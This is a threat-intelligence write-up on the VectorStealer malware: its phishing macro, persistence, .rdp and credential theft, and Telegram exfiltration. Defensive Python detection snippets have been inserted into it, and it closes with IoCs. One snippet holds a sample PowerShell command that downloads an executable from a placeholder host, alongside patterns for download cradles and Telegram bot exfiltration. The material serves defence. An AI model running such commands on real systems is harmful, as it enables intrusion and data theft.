Cyble – Vector Stealer: A Gateway For RDP Hijacking

Evasive Malware Targeting Remote Desktop Files

Information stealers are malware designed to steal sensitive information from infected computers, such as login credentials, financial data, and personal information. They typically do this by searching for specific types of files and data on the infected computer and then exfiltrating that information to a remote server controlled by the attackers.

Cyble Research and Intelligence Labs (CRIL) spotted a malware named ‘Vector Stealer’ that is capable of stealing .rdp files. Stealing RDP files can enable Threat Actors (TAs) to perform RDP hijacking, as these files contain details about the RDP session, including the information needed for remote access.

RDP hijacking enables TAs to gain unauthorized remote access to a victim’s system without credentials, allows for lateral movement, and creates opportunities for additional attacks.

VectorStealer surfaced in cybercrime forums in the second half of 2022. The Threat Actor (TA) behind this stealer mainly operates through a web panel and a Telegram channel.

The figure below shows the web panel of VectorStealer.

Figure 1 – VectorStealer Web Panel

The TA has claimed the following on their web panel:

“The VectorStealer can recover sensitive information from all major browsers, including Firefox, Chrome, and Safari. It can also steal Discord tokens and sensitive files and gather basic information about the infected computer.”

This stealer payload is sold for USD 63, payable in Bitcoin.

The figure below shows the payment details.  

Figure 2 – VectorStealer Subscription

The stealer payload can be generated from the web panel. This web panel allows an attacker to create custom malware without having advanced programming skills.

Such web panels typically have a user-friendly interface and provide various options for customization, such as the ability to specify what actions the malware will perform and configure the malware’s behavior. This stealer can exfiltrate the sensitive information stolen from the victim’s system using SMTP, Discord, and Telegram.

The figure below shows the builder options.

Figure 3 – VectorStealer Builder

Interestingly, on the same web panel, the TA is advertising the KGB crypter and claims that this crypter can kill multiple antivirus solutions. The figure below shows the section of the KGB crypter presented on the VectorStealer panel.

Figure 4 – KGB Crypter recommended on VectorStealer Panel

Crypters are tools used by threat actors (TAs) to evade detection by encrypting the malware code, making it difficult for antivirus software to identify and remove it.

The TAs behind the KGB Crypter use their own website to provide the service and claim that it is compatible with .NET- and C++-based binaries. They also claim that multiple prominent malware families, such as Redline, Quasar RAT, Venom RAT, and Pandora RAT, are already using this crypter.

Figure 5 – KGB Crypter Web Panel

The creators of KGB Crypter claim to be of Russian origin and boast that over 1,000 users have registered on their site, indicating its popularity among TAs. The crypter is offered as a paid service for USD 145 per month. It is equipped with a metamorphic generator, which alters the code each time it is compiled, making it more challenging for antivirus software to detect.

Figure 6 – KGB Crypter Builder

Technical Analysis

Initial Infection

CRIL found a phishing email that was spreading VectorStealer. This phishing email is themed around spare parts, carries an attachment named “POM-8501”, and pretends to come from a supplier.

The Malicious Document (MalDoc) attachment in the spam email is shown below.

Figure 7 – Phishing Mail Spreading VectorStealer

When the MalDoc attachment is opened, it prompts the user to enable macros. Enabling macros triggers the execution of malicious activities on the victim’s computer. The image below shows the malicious document (MalDoc).

Figure 8 – MalDoc

Upon analyzing the MalDoc, we found that one of the OLE streams contains a VBA macro. Upon execution, the macro code de-obfuscates a PowerShell script and executes it using the Shell() function. The PowerShell script contains code to download the next-stage payload from a remote server, save it as “ks.exe”, and execute it, as shown below.

Figure 9 – Macro Executing PowerShell Script
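The macro-to-PowerShell hand-off described above is one of the most reliable places to catch this infection chain on an endpoint: an Office application should almost never be the parent of a script host, and even less so one whose command line pulls content from the network. The following is an added detection example written for this article, not code from Cyble or from the malware. It classifies constructed Sysmon-style process-creation records (Event ID 1 fields); the computer names, paths and the placeholder URL are assumptions, and the command line is only a generic shape of a download cradle.

```python
import re

# Constructed Sysmon-style Event ID 1 records (process creation). Not real
# telemetry: hostnames, paths and the .invalid URL are placeholders.
SAMPLE_EVENTS = [
    {
        "EventID": 1,
        "Computer": "WS-0471",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                       ".DownloadFile('http://PLACEHOLDER.invalid/x','$env:APPDATA\\ks.exe')\"",
    },
    {   # Benign: an admin script launched from the desktop shell.
        "EventID": 1,
        "Computer": "WS-0102",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1",
    },
    {   # Benign: Word spawning the print spooler helper is normal.
        "EventID": 1,
        "Computer": "WS-0471",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": "splwow64.exe 12288",
    },
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Strings that indicate the script host is fetching something from the network
# or hiding its command line, which is what a macro-dropped stager needs to do.
CRADLE_MARKERS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|-enc(odedcommand)?\b",
    re.IGNORECASE,
)


def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return 'high', 'medium' or None for one process-creation event."""
    if event.get("EventID") != 1:
        return None
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return None
    if CRADLE_MARKERS.search(event.get("CommandLine", "")):
        return "high"    # Office -> script host that also reaches out to the network
    return "medium"      # Office -> script host at all is rare enough to review


def scan(events):
    """Collect (computer, parent, child, severity) for every event that fires."""
    hits = []
    for e in events:
        sev = classify(e)
        if sev:
            hits.append((e["Computer"], basename(e["ParentImage"]), basename(e["Image"]), sev))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Only the first record fires, as "high"; the Word-to-splwow64 lineage and the explorer-launched script are left alone. The parent/child pairing alone would already be worth a "medium" alert in most environments; the command-line markers are what lift it to "high" and cut the triage noise.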

Payload Execution

The stealer binary (SHA256: ca03561b59f1ba61afadfb577241e8c4f6ba56c7912ea62b6db9fb32a52b36bb) downloaded and executed by the MalDoc is a 32-bit .NET-based executable.

The figure below shows the file details.

Figure 10 – File Details

Persistence

Upon execution, the stealer copies itself into the %appdata% location and creates a scheduled task to establish persistence, as shown below.

Figure 11 – Persistence Through Task Scheduler
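A scheduled task whose action points into the user profile is the durable trace this persistence mechanism leaves behind, and it is easy to audit from an export of the task definitions (the XML that schtasks /query /xml produces). The example below is added here and is not Cyble's or the malware's code; it parses two constructed task definitions, flags the one whose executable lives in a user-writable directory and re-launches at logon, and leaves the vendor updater alone. The task name, the victim path and the use of the name ks.exe for the copy are assumptions made for the sample.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace used by schtasks /query /xml and Export-ScheduledTask.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a legitimate installer rarely uses for a persistent binary, but a
# stealer that copies itself into the profile always does.
USER_WRITABLE = re.compile(
    r"\\AppData\\(Roaming|Local)\\|%(APPDATA|LOCALAPPDATA|TEMP|TMP)%"
    r"|\\Windows\\Temp\\|\\Users\\Public\\",
    re.IGNORECASE,
)

# Constructed task definitions (not an export from an infected host).
# Task and file names are assumed for illustration.
SAMPLE_TASKS = {
    "ks": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\victim\\AppData\\Roaming\\ks.exe</Command>
    </Exec>
  </Actions>
</Task>""",
    "VendorUpdater": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger><StartBoundary>2023-01-01T03:00:00</StartBoundary></CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>"C:\\Program Files\\Vendor\\Updater.exe"</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>""",
}


def parse_task(xml_text):
    """Extract every Exec action and the trigger kinds from one task definition."""
    root = ET.fromstring(xml_text)
    actions = []
    for exec_node in root.findall(".//t:Actions/t:Exec", NS):
        cmd = exec_node.findtext("t:Command", default="", namespaces=NS).strip()
        args = exec_node.findtext("t:Arguments", default="", namespaces=NS).strip()
        actions.append((cmd, args))
    trig_parent = root.find("t:Triggers", NS)
    # Element tags carry the namespace as "{uri}LogonTrigger"; keep the local name.
    triggers = [] if trig_parent is None else [c.tag.split("}")[-1] for c in trig_parent]
    return {"actions": actions, "triggers": triggers}


def suspicious_tasks(tasks):
    """Return findings for tasks that launch a binary from a user-writable path."""
    findings = []
    for name, xml_text in tasks.items():
        info = parse_task(xml_text)
        for cmd, args in info["actions"]:
            reasons = []
            if USER_WRITABLE.search(cmd) or USER_WRITABLE.search(args):
                reasons.append("runs a binary from a user-writable location")
            if reasons and any(t in ("LogonTrigger", "BootTrigger") for t in info["triggers"]):
                reasons.append("re-launches at logon/boot")
            if reasons:
                findings.append({"task": name, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in suspicious_tasks(SAMPLE_TASKS):
        print(f["task"], f["command"], "; ".join(f["reasons"]))
```

On a live host the same check can be fed from the per-task XML files under C:\Windows\System32\Tasks or from a schtasks export; the path heuristic is deliberately narrow so that it surfaces profile-resident binaries without drowning the analyst in vendor updaters.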

After this, it spawns a new process that loads the next-stage payload, which uses KoiVM. KoiVM is a virtualizing protector for .NET applications that is made to work with ConfuserEx. KoiVM is designed to replace the .NET opcodes with new ones that only its virtualizing agent can understand.

The figure below shows the Koi stream present in MetaData.

Figure 12 – Koi Stream

The KoiVM further loads the VectorStealer and starts performing the stealer activities. Upon analyzing the memory dumps, we found that VectorStealer targets applications such as:

  • Mail Clients: Outlook, ThunderBird, FoxMail
  • Chat Applications: Discord, Telegram
  • Browsers: Opera, Vivaldi, Yandex, Brave, Chromium, Aloha Browser, Comodo Dragon, MapleStudio, ChromePlus, 360Browser, 7Star, CocCoc, Mozilla Firefox, Google Chrome
  • Cold Crypto Wallets: Exodus, Electrum

VectorStealer also queries the registry keys of a few applications to steal credentials.

The table below shows the registry keys queried by the stealer for collecting victims’ sensitive information.

Targeted Application: Outlook
Registry Keys:
  • HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  • HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  • HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Description: These keys store the saved passwords for Email, HTTP, SMTP, IMAP, and POP3 accounts.

Targeted Application: Foxmail
Registry Key:
  • SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command
Description: Used to find Foxmail’s installation directory.

File Grabber

The stealer then grabs important sensitive files from the victim’s machine. Interestingly, this stealer also grabs .rdp files. Stealing .rdp files can enable TAs to perform RDP (Remote Desktop Protocol) hijacking, as the files contain information related to the RDP session.

The figure below shows the stealer enumerating a directory for grabbing files with extensions such as .txt, .doc, .docx, .pdf, and .rdp.

Figure 13 – Targeted File Types
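What makes a stolen .rdp file valuable is the content it can carry: the target host, the account name, an RD Gateway, and optionally a saved password (a "password 51:b:" setting holding a DPAPI blob). A defender can turn that around and inventory which .rdp files in user profiles would hand an attacker a ready-made session if exfiltrated. The parser and audit below are an added example written for this article (not Cyble's tooling); the two sample files are constructed, and the host names, account and hex blob in them are placeholders.

```python
import os

# Constructed .rdp contents. The "password 51" blob is dummy hex, not a real DPAPI
# secret; host and account names are placeholders.
SAMPLE_SAVED = """screen mode id:i:2
full address:s:fileserver01.corp.example:3389
username:s:CORP\\jdoe
password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB00000000DEADBEEF
gatewayhostname:s:rdgw.corp.example
promptcredentialonce:i:1
"""

SAMPLE_CLEAN = """full address:s:jumpbox.corp.example
username:s:CORP\\jdoe
prompt for credentials:i:1
"""


def parse_rdp(text):
    """Parse the .rdp format: one 'name:type:value' per line, type s/i/b."""
    settings = {}
    for raw in text.splitlines():
        parts = raw.strip().split(":", 2)      # the value itself may contain ':'
        if len(parts) != 3 or parts[1] not in ("s", "i", "b"):
            continue
        name, kind, value = parts
        if kind == "i":
            try:
                value = int(value)
            except ValueError:
                continue
        settings[name] = value
    return settings


def assess_rdp(text):
    """Summarise what an attacker would learn from this file if it were stolen."""
    s = parse_rdp(text)
    saved = bool(s.get("password 51"))
    prompts = s.get("prompt for credentials") == 1
    findings = []
    if saved:
        findings.append("saved password blob present: decryptable under this user's DPAPI key")
    if s.get("username") and not prompts:
        findings.append("username pre-filled without a credential prompt: valid account/host pair exposed")
    if s.get("gatewayhostname"):
        findings.append("RD Gateway named: external entry point exposed")
    return {
        "target": s.get("full address"),
        "username": s.get("username"),
        "gateway": s.get("gatewayhostname"),
        "saved_password": saved,
        "findings": findings,
    }


def read_rdp(path):
    """mstsc writes UTF-16 LE with a BOM; hand-written files are usually ASCII."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith(b"\xff\xfe"):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="ignore")


def audit_directory(root_dir):
    """Walk a directory tree (e.g. C:\\Users) and assess every .rdp file found."""
    results = []
    for dirpath, _, files in os.walk(root_dir):
        for fn in files:
            if fn.lower().endswith(".rdp"):
                path = os.path.join(dirpath, fn)
                results.append((path, assess_rdp(read_rdp(path))))
    return results


if __name__ == "__main__":
    for label, text in (("saved", SAMPLE_SAVED), ("clean", SAMPLE_CLEAN)):
        print(label, assess_rdp(text))
```

Files that come back with a saved password or a pre-filled account are the ones whose theft turns into the credential-less access described above; the practical mitigation is to remove stored passwords from them and let the client prompt, which is exactly what the second sample does.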

Finally, the stealer creates a folder in the AppData\Local\Temp directory. This folder contains multiple sub-folders that store the data stolen from the respective applications.

The figure below shows the folders created by the stealer.

Figure 14 – Creating Folder in Temp Directory

After collecting all the stolen data, it compresses the folder into a zip archive. The archive can then be exfiltrated using SMTP, Discord webhooks, or the Telegram API. In this case, the stealer uses Telegram for exfiltration. It first sends a chat message to a Telegram bot controlled by the TA. This message contains details of the victim’s system, including the username, machine name, operating system, IP address, and antivirus product.

To identify the installed antivirus product, it uses the WMI query “SELECT * FROM AntiVirusProduct”. To fetch the victim’s IP address, the stealer sends a GET request to “hxxps://ipinfo.io/ip”.

The figure below shows the contents of the chat message.

Figure 15 – Telegram Chat Message

This stealer checks that it has a working internet connection before interacting with any remote servers, and terminates itself if it fails to establish one. After successfully sending the chat message, it sends the zip file containing the stolen data to the Telegram bot.

The figure below shows the POST request made by VectorStealer.

Figure 16 – Exfiltrating Data using a POST Request
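The exfiltration sequence just described, and the "monitor beacons at the network level" recommendation later in this post, suggest a concrete network detection: a non-browser process asks ipinfo.io for its public address and, within minutes, POSTs to the Telegram Bot API (api.telegram.org/bot<token>/sendMessage and /sendDocument, the endpoints a bot uses to send a message and a file). The code below is an added example written for this article, not Cyble's tooling; it runs the correlation over constructed proxy-log lines in a simple CSV shape (timestamp, host, process, method, url). Host names, the process inventory and the bot token are placeholders.

```python
import csv
import io
import re
from datetime import datetime, timedelta

# Constructed proxy log, not real traffic. Hosts and the bot token are placeholders.
SAMPLE_LOG = """timestamp,host,process,method,url
2023-01-25T10:02:11Z,WS-0471,ks.exe,GET,https://ipinfo.io/ip
2023-01-25T10:02:14Z,WS-0471,ks.exe,POST,https://api.telegram.org/bot000000000:CONSTRUCTED_TOKEN/sendMessage
2023-01-25T10:02:20Z,WS-0471,ks.exe,POST,https://api.telegram.org/bot000000000:CONSTRUCTED_TOKEN/sendDocument
2023-01-25T10:05:00Z,WS-0102,chrome.exe,GET,https://ipinfo.io/
2023-01-25T11:30:00Z,WS-0102,chrome.exe,GET,https://web.telegram.org/
2023-01-25T12:00:00Z,WS-0210,python.exe,GET,https://ipinfo.io/ip
"""

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe", "iexplore.exe"}
IPINFO = re.compile(r"^https?://ipinfo\.io(/|$)", re.IGNORECASE)
TELEGRAM_BOT = re.compile(r"^https?://api\.telegram\.org/bot[^/]+/(sendMessage|sendDocument)",
                          re.IGNORECASE)
WINDOW = timedelta(minutes=10)   # IP lookup followed by bot traffic inside this gap


def parse_log(text):
    """Read CSV proxy lines and attach a parsed timestamp to each row."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["ts"] = datetime.strptime(row["timestamp"], "%Y-%m-%dT%H:%M:%SZ")
        rows.append(row)
    return rows


def detect(rows):
    """Group by (host, process) and grade the ipinfo -> Telegram-bot sequence."""
    by_proc = {}
    for r in rows:
        by_proc.setdefault((r["host"], r["process"].lower()), []).append(r)

    findings = []
    for (host, proc), evs in by_proc.items():
        if proc in BROWSERS:          # a person visiting ipinfo.io or web.telegram.org is normal
            continue
        evs.sort(key=lambda r: r["ts"])
        ipinfo = [r for r in evs if IPINFO.search(r["url"])]
        tg = [r for r in evs if r["method"].upper() == "POST" and TELEGRAM_BOT.search(r["url"])]
        if tg:
            # High confidence when the address lookup precedes the bot POST within WINDOW.
            correlated = any(timedelta(0) <= (t["ts"] - i["ts"]) <= WINDOW
                             for t in tg for i in ipinfo)
            findings.append({
                "host": host, "process": proc,
                "severity": "high" if correlated else "medium",
                "methods": sorted({TELEGRAM_BOT.search(t["url"]).group(1) for t in tg}),
            })
        elif ipinfo:
            # A lone public-IP lookup from a non-browser is worth a look, nothing more.
            findings.append({"host": host, "process": proc, "severity": "low", "methods": []})
    return findings


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        print(f)
```

The ks.exe activity on WS-0471 scores "high" because both halves of the sequence appear from one process within the window, while the stand-alone lookup from python.exe on WS-0210 is only "low". If the organisation does not use Telegram bots legitimately, any POST to api.telegram.org/bot* from an endpoint is a candidate for an outright block; the "sendDocument" method in particular is how the zip archive leaves the network.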

Conclusion

We believe that the TAs behind VectorStealer and the KGB crypter are associated in some way. VectorStealer uses an unknown crypter and uses KoiVM for virtualization. Like other stealers, it targets browsers, email clients, crypto wallets, and chat applications.

VectorStealer specifically targets .rdp files and steals them, suggesting a potential interest in RDP hijacking to gain access to victims’ networks. TAs can leverage RDP files to carry out numerous attacks, including ransomware attacks.

Our Recommendations

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the suggestions given below:

  • Avoid downloading pirated software from warez/torrent websites. The “Hack Tool” present on sites such as YouTube, torrent sites, etc., typically contains such malware.
  • Use strong passwords and enforce multi-factor authentication wherever possible.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.
  • Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
  • Refrain from opening untrusted links and email attachments without first verifying their authenticity.
  • Educate employees on protecting themselves from threats like phishing/untrusted URLs.
  • Block URLs that could be used to spread the malware, e.g., Torrent/Warez.
  • Monitor beacons at the network level to block data exfiltration by malware or TAs.

MITRE ATT&CK® Techniques

Tactic                Technique ID   Technique Name
Initial Access        T1566          Phishing
Execution             T1204          User Execution
Credential Access     T1555          Credentials from Password Stores
                      T1539          Steal Web Session Cookies
                      T1552          Unsecured Credentials
Discovery             T1087          Account Discovery
                      T1518          Software Discovery
                      T1057          Process Discovery
                      T1124          System Time Discovery
                      T1007          System Service Discovery
                      T1614          System Location Discovery
Command and Control   T1071          Application Layer Protocol
Exfiltration          T1041          Exfiltration Over C&C Channel

Indicators of Compromise (IoCs):

Indicators                                                            Indicator Type   Description
hxxp[:]//185.246.220[.]65/2×2/img-078-410-00[.]exe                    URL              Malicious URL
hxxp[:]//185.246.220[.]65/2×2/PCqcxNVzIHq2raQ.exe                     URL              Malicious URL
a6280d3f50d1b373d5fa5f45247ac08b                                      MD5              VectorStealer Loader
421569147d9734ed3a9277bd3fbeacd42f1552ca                              SHA1             VectorStealer Loader
2b3aaa175f97c142679b9d9e7e9b9a2b2d85bf3990b1f9276f0dc79b0aaab06e      SHA256           VectorStealer Loader
939d6f6dd06eb826b27eda72f2ebe9c2                                      MD5              VectorStealer Loader
2ca7b12d8473867b6667a463aec7588a41ef9803                              SHA1             VectorStealer Loader
ca03561b59f1ba61afadfb577241e8c4f6ba56c7912ea62b6db9fb32a52b36bb      SHA256           VectorStealer Loader
ff06e0ddf65aafa2eb9a12fe38efbeb5                                      MD5              VectorStealer Payload
a2148b40c7dc3c5a198881ac403c98c9650b4374                              SHA1             VectorStealer Payload
b2d0305532b6f08f041cd109be667486c4a80deedb1394daad1e880a1d9a09d5      SHA256           VectorStealer Payload
c859df0fe0665a8e4dc4047260b22ff5                                      MD5              VectorStealer Payload
1582f28572a3a0e025720f2b9663ff4c1198131a                              SHA1             VectorStealer Payload
e1f8409d4599e86b42a8ac71c67b69b4d129509b6d9e3c06a668fecf71c768b8      SHA256           VectorStealer Payload

Source: https://blog.cyble.com/2023/02/01/vector-stealer-a-gateway-for-rdp-hijacking/